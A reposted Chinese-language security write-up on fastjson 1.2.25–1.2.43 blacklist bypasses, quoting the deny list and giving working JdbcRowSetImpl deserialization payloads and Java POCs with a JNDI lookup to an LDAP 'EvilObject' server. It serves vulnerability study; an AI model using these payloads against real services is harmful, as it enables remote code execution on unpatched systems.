从FastJson库的不同版本源码中对比学习绕过方法
2022-12-22 19:4:49 Author: FreeBuf(查看原文) 阅读量:15 收藏

1.2.25<=fastjson<=1.2.41反序列化漏洞。从这个版本的fastjson中,对前面的漏洞进行了修复,引入了checkAutoType安全机制,默认autoTypeSupport关闭,不能直接反序列化任意类,而打开 AutoType 之后,是基于内置黑名单来实现安全的,fastjson 也提供了添加黑名单的接口。

更新主要在com.alibaba.fastjson.parser.ParserConfig中。

  • autoTypeSupport:是否开启任意类型的反序列化,默认关闭;

  • denyList:反序列化类的黑名单;

  • acceptList:反序列化类的白名单。

//黑名单bshcom.mchangecom.sun.java.lang.Threadjava.net.Socketjava.rmijavax.xmlorg.apache.bcelorg.apache.commons.beanutilsorg.apache.commons.collections.Transformerorg.apache.commons.collections.functorsorg.apache.commons.collections4.comparatorsorg.apache.commons.fileuploadorg.apache.myfaces.context.servletorg.apache.tomcatorg.apache.wicket.utilorg.codehaus.groovy.runtimeorg.hibernateorg.jbossorg.mozilla.javascriptorg.python.coreorg.springframework

(向右滑动、查看更多)

添加白名单:

  1. 使用代码进行添加:ParserConfig.getGlobalInstance().addAccept(“org.su18.fastjson.,org.javaweb.”)

  1. 加上JVM启动参数:-Dfastjson.parser.autoTypeAccept=org.su18.fastjson.

  2. 在fastjson.properties中添加:fastjson.parser.autoTypeAccept=org.su18.fastjson.

漏洞分析 

跟进ParserConfig#checkAutoType.

如果开启了autoType,他会先判断是否在白里面,如果在,就会进行加载,之后再次判断是否在黑名单里面,如果在,就会抛出异常。

如果没有开启autoType,他会先判断是否在黑名单里面,如果在,就会抛出异常,之后再次判断是否在白名单里面,如果在,就进行加载。

当然,还有需要反序列化的类既不在黑名单上又不在白名单上面,那就只能是开启了autoType或者expectClass不为空,才会加载这个类。

那就跟进TypeUtils#loadClass,在加载类之前进行了递归调用来处理[ L ;等描述符。

这里就存在一个逻辑漏洞,前面检查黑名单是使用的startswith来进行检测的,我们在前面加载上L字符和后面加上;,这样就可以绕过黑名单的检查了,这俩个字符也会在这个位置给处理掉了,就成功达到了我们的目的。

POC
import com.alibaba.fastjson.JSON;import com.alibaba.fastjson.parser.ParserConfig;
public class Fj25_Jdbc_POC { public static void main(String[] args) { String payload = "{\"xx\":{" + "\"@type\":\"Lcom.sun.rowset.JdbcRowSetImpl;\"," + "\"dataSourceName\":\"ldap://127.0.0.1:8888/EvilObject\"," + "\"autoCommit\":true" + "}}"; //开启autotype ParserConfig.getGlobalInstance().setAutoTypeSupport(true); JSON.parseObject(payload); }}

(向右滑动、查看更多)

//payload{  "xx": {    "@type": "Lcom.sun.rowset.JdbcRowSetImpl;",    "dataSourceName": "ldap://127.0.0.1:8888/EvilObject",    "autoCommit": true  }}

(向右滑动、查看更多)

条件限制

和前面的JdbcRowSetImpl利用链一样需要有网,还有就是需要开启AutoType.

1.2.25<=fastjson<=1.2.42反序列化漏洞

jar包版本: 1.2.42

漏洞分析

仍然还是看看ParserConfig里面修改的内容。

这不是直接把黑白名单给进行了hash处理,以防进行黑名单绕过。跟进ParserConfig#checkAutoType,发现多写了一个判断,这里使用hash写的。

大概的意思是如果类的第一个字符是L,结尾的字符是;就会取第二个字符到倒数第二个字符的内容,就类似于进行了startwith这种函数来判断,但是这里只去除了一次,后面是递归操作,就可以双写绕过。

POC
import com.alibaba.fastjson.JSON;import com.alibaba.fastjson.parser.ParserConfig;
public class Fj42_Jdbc_POC { public static void main(String[] args) { String payload = "{\"xx\":{" + "\"@type\":\"LLcom.sun.rowset.JdbcRowSetImpl;;\"," + "\"dataSourceName\":\"ldap://127.0.0.1:8888/EvilObject\"," + "\"autoCommit\":true" + "}}"; //开启autotype ParserConfig.getGlobalInstance().setAutoTypeSupport(true); JSON.parseObject(payload); }}

(向右滑动、查看更多)

//payload{  "xx": {    "@type": "LLcom.sun.rowset.JdbcRowSetImpl;;",    "dataSourceName": "ldap://127.0.0.1:8888/EvilObject",    "autoCommit": true  }}

(向右滑动、查看更多)

条件限制

和上一个版本是一样的:

  1. 有网

  2. 开启AutoType

1.2.25<=fastjson<=1.2.43反序列化漏洞

漏洞分析

这个版本在ParserConfig#checkAutoType中做出了修改。

if ((((BASIC                ^ className.charAt(0))                * PRIME)                ^ className.charAt(className.length() - 1))                * PRIME == 0x9198507b5af98f0L)        {            if ((((BASIC                    ^ className.charAt(0))                    * PRIME)                    ^ className.charAt(1))                    * PRIME == 0x9195c07b5af5345L)            {                throw new JSONException("autoType is not support. " + typeName);            }            // 9195c07b5af5345            className = className.substring(1, className.length() - 1);        }

(向右滑动、查看更多)

如果出现了多个L,就会直接抛出异常。但是在loadClass中,同样对[进行了处理。

if(className == null || className.length() == 0){            return null;        }        Class<?> clazz = mappings.get(className);        if(clazz != null){            return clazz;        }        if(className.charAt(0) == '['){            Class<?> componentType = loadClass(className.substring(1), classLoader);            return Array.newInstance(componentType, 0).getClass();        }        if(className.startsWith("L") && className.endsWith(";")){            String newClassName = className.substring(1, className.length() - 1);            return loadClass(newClassName, classLoader);        }

(向右滑动、查看更多)

我们就可以通过[进行黑名单绕过。

Payload{  "RoboTerh": {    "@type": "[com.sun.rowset.JdbcRowSetImpl"[{,    "dataSourceName": "ldap://127.0.0.1:8888/EvilObject",    "autoCommit": true  }}

(向右滑动、查看更多)

条件限制

和之前的一样。

fastjson1.2.44

分析

这个版本主要是修复了上一个版本利用[进行绕过的方法。

参考:

https://su18.org/

精彩推荐


文章来源: http://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651210987&idx=3&sn=8db663a9d22a4aad212df0641eec03c1&chksm=bd1dd6608a6a5f764a783c207c23025c60da312c20486c61edb37b8bac028e1f1bed75383cd3#rd
如有侵权请联系:admin#unsafe.sh